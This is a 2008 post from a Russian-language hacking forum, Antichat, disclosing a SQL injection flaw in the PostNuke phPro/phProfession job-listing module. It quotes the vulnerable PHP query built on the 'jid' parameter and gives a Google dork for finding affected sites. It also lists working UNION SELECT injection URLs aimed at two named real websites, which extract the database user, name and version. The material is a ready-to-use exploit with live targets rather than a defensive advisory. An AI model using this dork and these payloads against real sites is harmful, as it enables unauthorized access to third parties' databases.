Тема: Уязвимости модулей PostNuke
Показать сообщение отдельно

  #9  
Старый 19.12.2008, 00:33
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
PostNuke. Модуль: phPro(Девичья фамилия: phProfession) SQL

Уязвимый продукт: Модуль: phPro(phProfession)
Версия: 3.0
Дорк: "inurl:module=phPro"
Условие: "нет"

Уязвимый кусок кода:
PHP код:
    $sql "SELECT $joblistingcolumn[vacancy],
                   $joblistingcolumn[jid],
                   $jobdepartmentcolumn[department],
                   $jobdepartmentcolumn[id],
                   $joblocationcolumn[location],
                   $joblocationcolumn[id],
                   $jobsalarycolumn[salary],
                   $jobsalarycolumn[id],
                   $joblistingcolumn[responsibilities],
                   $joblistingcolumn[qualifications],
                   $joblistingcolumn[cname],
                   $joblistingcolumn[cmail],
                   $joblistingcolumn[posted],
                   $joblistingcolumn[hits],
                   $joblistingcolumn[fk_pn_uid],
                   $joblistingcolumn[fk_expper_id],
                   $joblistingcolumn[expirytime],
                   $joblistingcolumn[active]
            FROM $joblistingtable,
                $jobdepartmenttable,
                $joblocationtable,
                $jobsalarytable
            WHERE $jobdepartmentcolumn[id] = $joblistingcolumn[fk_department]
            AND $joblocationcolumn[id] = $joblistingcolumn[fk_location]
            AND $jobsalarycolumn[id] = $joblistingcolumn[fk_salary]
            AND $joblistingcolumn[jid] = " pnVarPrepForStore($jid); 
Уязвимый параметр jid

История с этим модулем такая, там откуда я его сливал в папке "phprofession" лежали два архива: "phPro_v3.0alpha" и "phprofession2.5.4" код выше из "phPro" , а в "phprofession" в коде даже параметра такого нет, ставить я его не стал(версия старая), а вот в гугле глянул. Оказалось что запись "module=phProfession" в урле можно запросто изменить на "module=phPro" и всё будет нормольно. а вот наоборот нет. Тоесть совместимость вроде должна быть у новой версии со старой, а тут наоборот (разбираться с этой байдой не стал, т.к к делу отношения не имеет.Кому хочется привожу оба линка).

Примеры уязвимости:
http://www.hillelsaroundchicago.org/index.php?module=phPro&func=display&jid=-57+union+select+1,concat_ws(0x3a,User(),Database() ,Version()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0
http://www.arundellodge.org/index.php?module=phProfession&func=display&jid=-57+union+select+1,concat_ws(0x3a,User(),Database() ,Version()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0
 
Ответить с цитированием